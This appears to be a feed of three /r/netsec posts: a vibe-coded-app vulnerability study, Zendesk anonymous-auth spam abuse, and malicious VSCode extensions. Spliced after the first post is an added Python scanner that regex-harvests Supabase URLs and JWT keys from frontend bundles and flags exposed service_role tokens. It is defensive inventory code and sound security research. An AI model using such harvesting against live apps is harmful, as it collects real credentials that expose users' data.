How we found +2k vulns, 400+ secrets and 175 PII instances in publicly exposed apps built on vibe-coded platforms (Research methodology)

By: /u/PriorPuzzleheaded880 — October 30th 2025 at 15:53

I think one of the interesting parts in methodology is that due to structure of the integration between Lovable front-ends and Supabase backends via API, and the fact that certain high-value signals (for example, anonymous JWTs to APIs linking Supabase backends) only appear in frontend bundles or source output, we needed to introduce a lightweight, read-only scan to harvest these artifacts and feed them back into the attack surface management inventory.

Here is the blog article that describes our methodology in depth.

In a nutshell, we found:

- 2k medium vulns, 98 highly critical issues
- 400+ exposed secrets
- 175 instances of PII (including bank details and medical info)
- Several confirmed BOLA, SSRF, 0-click account takeover and others

submitted by /u/PriorPuzzleheaded880
[link] [comments]
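The read-only artifact harvest described in the post (pulling Supabase endpoints and anon JWTs out of frontend bundles into an inventory) can be sketched in a few dozen lines. The scanner below is an added example, not the researchers' tooling: the bundle text and both tokens are constructed, the token signatures are garbage because the scanner decodes without verifying, the assumption that Supabase project refs are 20 lowercase alphanumerics is this example's, and the severity labels are its own choice.

```python
"""Added example: harvest Supabase URLs and JWT-shaped keys from a frontend bundle.

Everything here is constructed for illustration. The scanner inventories what a
bundle exposes; it never trusts or verifies the tokens it finds.
"""
import base64
import json
import re
from dataclasses import dataclass

# base64url('{"') starts with "eyJ", so every JWT header and payload segment does too.
JWT_RE = re.compile(r"eyJ[A-Za-z0-9_-]{10,}\.eyJ[A-Za-z0-9_-]{10,}\.[A-Za-z0-9_-]{10,}")
# Assumption: Supabase project refs are 20 lowercase alphanumerics.
SUPABASE_URL_RE = re.compile(r"https://[a-z0-9]{20}\.supabase\.co")


def b64url_decode(segment: str) -> bytes:
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def decode_jwt_unverified(token: str) -> tuple[dict, dict]:
    """Header and payload only; no signature check (inventorying, not trusting)."""
    header, payload, _signature = token.split(".")
    return json.loads(b64url_decode(header)), json.loads(b64url_decode(payload))


@dataclass
class Finding:
    kind: str
    value: str
    severity: str
    detail: str


def classify_supabase_token(header: dict, payload: dict) -> tuple[str, str]:
    role = payload.get("role")
    detail = f"iss={payload.get('iss')} ref={payload.get('ref')} role={role} alg={header.get('alg')}"
    if payload.get("iss") != "supabase":
        return "low", detail
    if role == "service_role":   # bypasses row-level security: must never ship to a browser
        return "critical", detail
    if role == "anon":           # public by design, but pins the backend for later RLS/BOLA testing
        return "medium", detail
    return "low", detail


def scan_bundle(text: str) -> list[Finding]:
    findings: list[Finding] = []
    for m in SUPABASE_URL_RE.finditer(text):
        findings.append(Finding("supabase_url", m.group(0), "info", "backend endpoint for the inventory"))
    for m in JWT_RE.finditer(text):
        token = m.group(0)
        try:
            header, payload = decode_jwt_unverified(token)
        except ValueError:       # not real base64/JSON: an eyJ... lookalike
            continue
        severity, detail = classify_supabase_token(header, payload)
        findings.append(Finding("jwt", token[:16] + "...", severity, detail))
    return findings


def fake_token(role: str, ref: str = "abcdefghijklmnopqrst") -> str:
    """Constructed token with a bogus signature; only the shape matters here."""
    header = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    payload = b64url_encode(json.dumps({"iss": "supabase", "ref": ref, "role": role,
                                        "iat": 1700000000, "exp": 2000000000}).encode())
    return f"{header}.{payload}.{b64url_encode(b'not-a-real-signature')}"


# Constructed stand-in for a production bundle that ships both keys.
SAMPLE_BUNDLE = (
    'const s=createClient("https://abcdefghijklmnopqrst.supabase.co","'
    + fake_token("anon") + '");'
    'const admin=createClient("https://abcdefghijklmnopqrst.supabase.co","'
    + fake_token("service_role") + '");'
)


if __name__ == "__main__":
    for f in scan_bundle(SAMPLE_BUNDLE):
        print(f"[{f.severity}] {f.kind}: {f.value}  {f.detail}")
```

An anon key on its own is not a vulnerability; Supabase expects it to be public. Its value to an attack-surface inventory is that it names the exact backend, so the next step (checking what row-level security actually lets that role read or write) has a concrete target. A `service_role` key in a bundle is the finding that matters on its own.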
/r/netsec - Information Security News & Discussion

Zendesk's Anonymous Authentication exploited for Email Spam

By: /u/PersianMG — October 26th 2025 at 05:11

I wrote a blog post about the recent onslaught of Zendesk spam emails and how a design flaw in its Anonymous Authentication feature was exploited.

submitted by /u/PersianMG
[link] [comments]
/r/netsec - Information Security News & Discussion

Attackers Target VSCode Extension Marketplace, IDE Plugins Face Higher Supply Chain Attack Risks

By: /u/Fit_Wing3352 — October 29th 2025 at 05:08

HelixGuard found a dozen malicious extensions in the VSCode marketplace targeting developers.

submitted by /u/Fit_Wing3352
[link] [comments]